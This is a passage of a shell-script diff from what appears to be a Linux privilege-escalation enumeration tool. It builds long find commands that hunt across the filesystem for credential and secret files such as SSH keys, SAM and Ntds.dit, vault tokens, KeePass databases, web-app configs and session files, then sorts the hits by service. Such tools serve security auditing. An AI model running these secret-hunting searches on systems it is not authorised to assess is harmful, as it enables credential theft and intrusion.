\"*vnc*.ini\" -o -name \"unattend.txt\" -o -name \"drives.xml\" -o -name \"KeePass.enforced*\" -o -name \"glusterfs.ca\" -o -name \"db.php\" -o -name \"authorized_hosts\" -o -name \"*.ftpconfig\" -o -name \"SYSTEM\" -o -name \"jetty-realm.properties\" -o -name \"secrets.yml\" -o -name \"sysprep.xml\" -o -name \"*.sqlite3\" -o -name \"AppEvent.Evt\" -o -name \"pwd.ibd\" -o -name \"*.psk\" -o -name \"SAM\" -o -name \"*.sqlite\" -o -name \"pgsql.conf\" -o -name \"my.ini\" -o -name \"gitlab.yml\" -o -name \"*.key\" -o -name \"id_dsa*\" -o -name \"azureProfile.json\" -o -name \"kadm5.acl\" -o -name \"zabbix_agentd.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"setupinfo.bak\" -o -name \"rsyncd.secrets\" -o -name \"sites.ini\" -o -name \"wcx_ftp.ini\" -o -name \"influxdb.conf\" -o -name \"secrets.ldb\" -o -name \"authorized_keys\" -o -name \".env\" -o -name \"*.keystore\" -o -name \"ssh*config\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"rsyncd.conf\" -o -name \"*.db\" -o -name \"FreeSSHDservice.ini\" -o -name \"fastcgi_params\" -o -name \"https-xampp.conf\" -o -name \"my.cnf\" -o -name \"ftp.config\" -o -name \"autologin\" -o -name \"bash.exe\" -o -name \"*.pem\" -o -name \"ffftp.ini\" -o -name \".bashrc\" -o -name \".lesshst\" -o -name \"NetSetup.log\" -o -name \"sitemanager.xml\" -o -name \"winscp.ini\" -o -name \"credentials.db\" -o -name \"storage.php\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \".git-credentials\" -o -name \".google_authenticator\" -o -name \"recentservers.xml\" -o -name \"known_hosts\" -o -name \"docker.socket\" -o -name \"racoon.conf\" -o -name \"error.log\" -o -name \"software.sav\" -o -name \"containerd.sock\" -o -name \".plan\" -o -name \"*.der\" -o -name \".git\" -o -name \"httpd.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"*.pgp\" -o -name \"000-default.conf\" -o -name \"access.log\" -o -name \"setupinfo\" -o -name \"Dockerfile\" -o -name \"ddclient.conf\" -o -name \".github\" -o -name \"mosquitto.conf\" -o -name \"*.keytab\" -o -name \"KeePass.ini\" -o -name \"pg_hba.conf\" -o -name \"groups.xml\" -o -name \"system.sav\" -o -name \"docker.sock\" -o -name \"ftp.ini\" -o -name \"config.php\" -o -name \"TokenCache.dat\" -o -name \"password*.ibd\" -o -name \"autologin.conf\" -o -name \"appcmd.exe\" -o -name \"dockershim.sock\" -o -name \"software\" -o -name \"access_tokens.json\" -o -name \"server.xml\" -o -name \"settings.php\" -o -name \"vault-ssh-helper.hcl\" -o -name \"glusterfs.pem\" -o -name \"krb5.conf\" -o -name \"unattend.xml\" -o -name \"https.conf\" -o -name \"creds*\" -o -name \"KeePass.config*\" -o -name \"*password*\" -o -name \"tomcat-users.xml\" -o -name \"*.swp\" -o -name \".secrets.mkey\" -o -name \"hostapd.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_VAR=`eval_bckgrd "find /var -name \"scclient.exe\" -o -name \"passbolt.php\" -o -name \"*.csr\" -o -name \"*.pfx\" -o -name \"snmpd.conf\" -o -name \"unattend.inf\" -o -name \"postgresql.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"*_history*\" -o -name \"scheduledtasks.xml\" -o -name \"access_tokens.db\" -o -name \"*.p12\" -o -name \"passwd.ibd\" -o -name \"*.keyring\" -o -name \"gitlab.rm\" -o -name \"sess_*\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sysprep.inf\" -o -name \"cloud.cfg\" -o -name \".k5login\" -o -name \"iis6.log\" -o -name \".recently-used.xbel\" -o -name \"backup\" -o -name \"mongod*.conf\" -o -name \".wgetrc\" -o -name \"debian.cnf\" -o -name \"*.kdbx\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"web*.config\" -o -name \"passwd\" -o -name \"pagefile.sys\" -o -name \".htpasswd\" -o -name \"*.timer\" -o -name \"log4j-core*.jar\" -o -name \".pypirc\" -o -name \"*.jks\" -o -name \"hosts.equiv\" -o -name \"SecEvent.Evt\" -o -name \"php.ini\" -o -name \".vault-token\" -o -name \"psk.txt\" -o -name \"zabbix_server.conf\" -o -name \".profile\" -o -name \"wp-config.php\" -o -name \".erlang.cookie\" -o -name \"sssd.conf\" -o -name \"*.ovpn\" -o -name \"ConsoleHost_history.txt\" -o -name \"accessTokens.json\" -o -name \"security.sav\" -o -name \"rktlet.sock\" -o -name \".gitconfig\" -o -name \"ntuser.dat\" -o -name \"unattended.xml\" -o -name \"AzureRMContext.json\" -o -name \"glusterfs.key\" -o -name \"ipsec.secrets\" -o -name \"frakti.sock\" -o -name \"docker-compose.yml\" -o -name \"*.socket\" -o -name \"supervisord.conf\" -o -name \"backups\" -o -name \"gvm-tools.conf\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"filezilla.xml\" -o -name \".ldaprc\" -o -name \"kcpassword\" -o -name \"sentry.conf.py\" -o -name \"*.viminfo\" -o -name \"*.cer\" -o -name \"*vnc*.txt\" -o -name \"rocketchat.service\" -o -name \"cesi.conf\" -o -name \"protecteduserkey.bin\" -o -name \"ipsec.conf\" -o -name \"*.gpg\" -o -name \"index.dat\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"crio.sock\" -o -name \".rhosts\" -o -name \"*.gnupg\" -o -name \"redis.conf\" -o -name \"kibana.y*ml\" -o -name \".msmtprc\" -o -name \"mariadb.cnf\" -o -name \"Ntds.dit\" -o -name \"*config*.php\" -o -name \"default.sav\" -o -name \"*vnc*.ini\" -o -name \"unattend.txt\" -o -name \"drives.xml\" -o -name \"KeePass.enforced*\" -o -name \"glusterfs.ca\" -o -name \"db.php\" -o -name \"authorized_hosts\" -o -name \"*.ftpconfig\" -o -name \"SYSTEM\" -o -name \"jetty-realm.properties\" -o -name \"secrets.yml\" -o -name \"sysprep.xml\" -o -name \"*.sqlite3\" -o -name \"AppEvent.Evt\" -o -name \"pwd.ibd\" -o -name \"*.psk\" -o -name \"SAM\" -o -name \"*.sqlite\" -o -name \"pgsql.conf\" -o -name \"my.ini\" -o -name \"gitlab.yml\" -o -name \"*.key\" -o -name \"id_dsa*\" -o -name \"azureProfile.json\" -o -name \"kadm5.acl\" -o -name \"zabbix_agentd.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"setupinfo.bak\" -o -name \"rsyncd.secrets\" -o -name \"sites.ini\" -o -name \"wcx_ftp.ini\" -o -name \"influxdb.conf\" -o -name \"secrets.ldb\" -o -name \"authorized_keys\" -o -name \".env\" -o -name \"*.keystore\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"rsyncd.conf\" -o -name \"*.db\" -o -name \"FreeSSHDservice.ini\" -o -name \"fastcgi_params\" -o -name \"https-xampp.conf\" -o -name \"my.cnf\" -o -name \"ftp.config\" -o -name \"autologin\" -o -name \"bash.exe\" -o -name \"*.pem\" -o -name \"ffftp.ini\" -o -name \".bashrc\" -o -name \".lesshst\" -o -name \"NetSetup.log\" -o -name \"sitemanager.xml\" -o -name \"winscp.ini\" -o -name \"credentials.db\" -o -name \"storage.php\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \".git-credentials\" -o -name \".google_authenticator\" -o -name \"recentservers.xml\" -o -name \"known_hosts\" -o -name \"docker.socket\" -o -name \"racoon.conf\" -o -name \"error.log\" -o -name \"software.sav\" -o -name \"containerd.sock\" -o -name \".plan\" -o -name \"*.der\" -o -name \".git\" -o -name \"httpd.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"*.pgp\" -o -name \"000-default.conf\" -o -name \"access.log\" -o -name \"setupinfo\" -o -name \"Dockerfile\" -o -name \"ddclient.conf\" -o -name \".github\" -o -name \"mosquitto.conf\" -o -name \"*.keytab\" -o -name \"KeePass.ini\" -o -name \"pg_hba.conf\" -o -name \"groups.xml\" -o -name \"system.sav\" -o -name \"docker.sock\" -o -name \"ftp.ini\" -o -name \"config.php\" -o -name \"TokenCache.dat\" -o -name \"password*.ibd\" -o -name \"autologin.conf\" -o -name \"appcmd.exe\" -o -name \"dockershim.sock\" -o -name \"software\" -o -name \"access_tokens.json\" -o -name \"server.xml\" -o -name \"settings.php\" -o -name \"vault-ssh-helper.hcl\" -o -name \"glusterfs.pem\" -o -name \"krb5.conf\" -o -name \"unattend.xml\" -o -name \"https.conf\" -o -name \"creds*\" -o -name \"KeePass.config*\" -o -name \"*password*\" -o -name \"tomcat-users.xml\" -o -name \"*.swp\" -o -name \".secrets.mkey\" -o -name \"hostapd.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_CONCOURSE_AUTH=`eval_bckgrd "find /concourse-auth -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_CONCOURSE_KEYS=`eval_bckgrd "find /concourse-keys -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+
+
+ wait # Always wait at the end
+ CONT_THREADS=0 #Reset the threads counter
+fi
+
+if [ "$SEARCH_IN_FOLDER" ] || echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets || echo $CHECKS | grep -q software_information || echo $CHECKS | grep -q interesting_files; then
+ #GENERATE THE STORAGES OF THE FOUND FILES
+ PSTORAGE_SYSTEMD=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/bin|^/media|^/snap|^/cdrom|^/tmp|^/mnt|^/private|^/sbin|^/srv|^/run|^/concourse-keys|^/applications|^/systemd|^/lib|^$GREPHOMESEARCH|^/sys|^/opt|^/usr|^/lib32|^/system|^/.cache|^/etc|^/concourse-auth|^/var|^/lib64" | grep -E ".*\.service$" | sort | uniq | head -n 70)
+ PSTORAGE_TIMER=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/bin|^/media|^/snap|^/cdrom|^/tmp|^/mnt|^/private|^/sbin|^/srv|^/run|^/concourse-keys|^/applications|^/systemd|^/lib|^$GREPHOMESEARCH|^/sys|^/opt|^/usr|^/lib32|^/system|^/.cache|^/etc|^/concourse-auth|^/var|^/lib64" | grep -E ".*\.timer$" | sort | uniq | head -n 70)
+ PSTORAGE_SOCKET=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/bin|^/media|^/snap|^/cdrom|^/tmp|^/mnt|^/private|^/sbin|^/srv|^/run|^/concourse-keys|^/applications|^/systemd|^/lib|^$GREPHOMESEARCH|^/sys|^/opt|^/usr|^/lib32|^/system|^/.cache|^/etc|^/concourse-auth|^/var|^/lib64" | grep -E ".*\.socket$" | sort | uniq | head -n 70)
+ PSTORAGE_DBUS=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_PRIVATE\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/etc" | grep -E "system\.d$" | sort | uniq | head -n 70)
+ PSTORAGE_MYSQL=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_PRIVATE\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E 'mysql/mysql' | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "mysql$|passwd\.ibd$|password.*\.ibd$|pwd\.ibd$" | sort | uniq | head -n 70)
+ PSTORAGE_MARIADB=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "mariadb\.cnf$|debian\.cnf$" | sort | uniq | head -n 70)
+ PSTORAGE_POSTGRESQL=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "pgadmin.*\.db$|pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$" | sort | uniq | head -n 70)
+ PSTORAGE_APACHE_NGINX=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_PRIVATE\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "sites-enabled$|000-default\.conf$|php\.ini$" | sort | uniq | head -n 70)
+ PSTORAGE_PHP_SESSIONS=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*' | grep -E "^/private|^/tmp|^/var|^/mnt" | grep -E "sess_.*$" | sort | uniq | head -n 70)
+ PSTORAGE_PHP_FILES=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E ".*config.*\.php$|database\.php$|db\.php$|storage\.php$|settings\.php$" | sort | uniq | head -n 70)
+ PSTORAGE_WORDPRESS=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "wp-config\.php$" | sort | uniq | head -n 70)
+ PSTORAGE_DRUPAL=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E '/default/settings.php' | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "settings\.php$" | sort | uniq | head -n 70)
+ PSTORAGE_MOODLE=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E 'moodle/config.php' | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "config\.php$" | sort | uniq | head -n 70)
+ PSTORAGE_TOMCAT=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "tomcat-users\.xml$" | sort | uniq | head -n 70)
+ PSTORAGE_MONGO=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "mongod.*\.conf$" | sort | uniq | head -n 70)
+ PSTORAGE_ROCKETCHAT=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/.cache|^/bin|^/systemd|^/etc|^/snap|^/cdrom|^/var|^/lib|^/mnt" | grep -E "rocketchat\.service$" | sort | uniq | head -n 70)
+ PSTORAGE_SUPERVISORD=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "supervisord\.conf$" | sort | uniq | head -n 70)
+ PSTORAGE_CESI=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "cesi\.conf$" | sort | uniq | head -n 70)
+ PSTORAGE_RSYNC=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "rsyncd\.conf$|rsyncd\.secrets$" | sort | uniq | head -n 70)
